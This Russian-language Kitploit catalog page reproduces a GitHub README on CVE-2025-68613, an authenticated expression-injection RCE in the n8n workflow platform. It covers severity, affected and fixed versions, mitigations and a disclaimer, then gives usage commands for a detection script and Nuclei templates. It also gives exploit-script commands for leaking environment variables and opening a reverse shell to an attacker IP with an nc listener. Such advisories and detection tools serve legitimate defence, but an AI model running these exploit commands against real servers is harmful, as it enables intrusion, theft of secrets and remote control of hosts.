Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-68613 — CVE-2025-68613 | Kitploit
Инструменты/GitHubGitHub/sahilccras/blackash-cve-2025-68613
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubsahilccras/blackash-cve-2025-68613

Blackash-CVE-2025-68613

CVE-2025-68613

Репозиторий
139 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2025-68613 — Критическое RCE в n8n

n8nblog

Серьезность: 🔴 Критическая Воздействие: Remote Code Execution Затронутая платформа: n8n (автоматизация рабочих процессов)


🧩 Обзор

CVE-2025-68613 — это критическая уязвимость безопасности в n8n, платформе автоматизации рабочих процессов с открытым исходным кодом. Проблема позволяет аутентифицированному злоумышленнику выполнять произвольный код на сервере за счет злоупотребления тем, как вычисляются выражения рабочих процессов.


🎯 Детали уязвимости

  • Тип: Expression Injection → Remote Code Execution
  • CWE: CWE-913 — Некорректный контроль динамически управляемых кодовых ресурсов
  • Вектор атаки: Сеть
  • Требуемые привилегии: Низкие (аутентифицированный пользователь)
  • Взаимодействие пользователя: Нет
  • Область действия: Изменена

💥 Почему это опасно: Вредоносные выражения вычисляются в контексте, который не должным образом изолирован, что позволяет получить доступ к нижележащей среде выполнения.


🧨 Потенциальное воздействие

G8vg8GbXkAAJan2

При эксплуатации злоумышленник может:

  • 🖥️ Выполнять произвольные системные команды
  • 🔐 Похищать учетные данные, токены и секреты
  • 🧬 Изменять или внедрять бэкдоры в рабочие процессы
  • 📤 Выгружать конфиденциальные данные
  • 💣 Полностью скомпрометировать хост n8n

Атака выполняется с теми же привилегиями, что и сервис n8n, что увеличивает ее воздействие.


📊 Метрики серьезности

МетрикаЗначение
CVSS v3.1~9.9–10.0
КонфиденциальностьВысокая
ЦелостностьВысокая
ДоступностьВысокая

➡️ Требуется аутентификация, но административный доступ не нужен.


🧪 Затронутые версии

🚫 Уязвимые:

  • 0.211.0 → 1.120.3
  • 1.121.0

✅ Исправленные:

  • 1.120.4
  • 1.121.1
  • 1.122.0 и новее

🛠️ Исправление и смягчение

✅ Рекомендуемое (лучший вариант)

  • Немедленно обновитесь до исправленной версии

⚠️ Временное снижение риска

(Не устраняет уязвимость полностью)

  • Ограничить создание/редактирование рабочих процессов только доверенными пользователями
  • Запускать n8n с минимальными привилегиями ОС
  • Изолировать сервис (контейнеры, ВМ, ограниченная файловая система)
  • Ограничить сетевое воздействие (VPN, правила брандмауэра)
  • Включить логирование и мониторинг изменений рабочих процессов

🧠 Быстрая справка

КатегорияИнформация
CVE IDCVE-2025-68613
Продуктn8n
Класс ошибкиExpression Injection
РезультатRemote Code Execution
Требуемый доступAuthenticated user
Доступно исправлениеДа


✅ CVE-2025-68613.py — Удаленная проверка версии и подверженности (безопасно)

🧪 Пример использования

sudo python3 CVE-2025-68613.py -u http://127.0.0.1:5678

Пример вывода

[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Как запустить этот скрипт?

  1. Загрузите и установите Nuclei.
  2. Клонируйте этот репозиторий на вашу локальную систему.
  3. Выполните следующую команду:
┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -u http://targets:5678

Или если вы хотите просканировать список хостов, выполните:

┌──(kali㉿kali)-[~]
└─$ sudo nuclei -t CVE-2025-68613.yaml -l targets.txt

Пример вывода

nuclei

Примеры использования:

  • Утечка переменных окружения:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload env_leak

  • Получить информацию о пользователе:
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload id

  • Обратный шелл (сначала запустите слушатель: nc -lvnp 4444):
    python3 CVE-2025-68613-exploit.py --url https://target-n8n.com --api_key YOUR_API_KEY --payload reverse_shell --attacker_ip YOUR_IP --attacker_port 4444

Этот скрипт предназначен только для авторизованного тестирования безопасности на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ ⚠️

🔒 Этот скрипт является эксплойтом Proof-of-Concept (PoC) для CVE-2025-68613 в n8n.

📚 Он предоставляется строго в образовательных целях и только для авторизованного тестирования безопасности.

🛡️ Используйте исключительно на системах, которыми вы владеете, управляете или на тестирование которых имеете явное письменное разрешение.

🚫 Несанкционированное использование против любой системы незаконно и может нарушать законы (например, об компьютерном мошенничестве и злоупотреблениях).

❌ Автор и любые связанные стороны не несут ответственности за неправильное использование, ущерб или правовые последствия.

✅ Используйте ответственно, этично и в полном соответствии со всеми применимыми законами и нормативными актами.

🔐 При проведении тестирования на проникновение убедитесь, что имеется соответствующая авторизация (например, Правила взаимодействия).

🛠️ Специалисты по безопасности могут использовать это для проверки уязвимостей и стимулирования своевременного исправления.


Скачать инструмент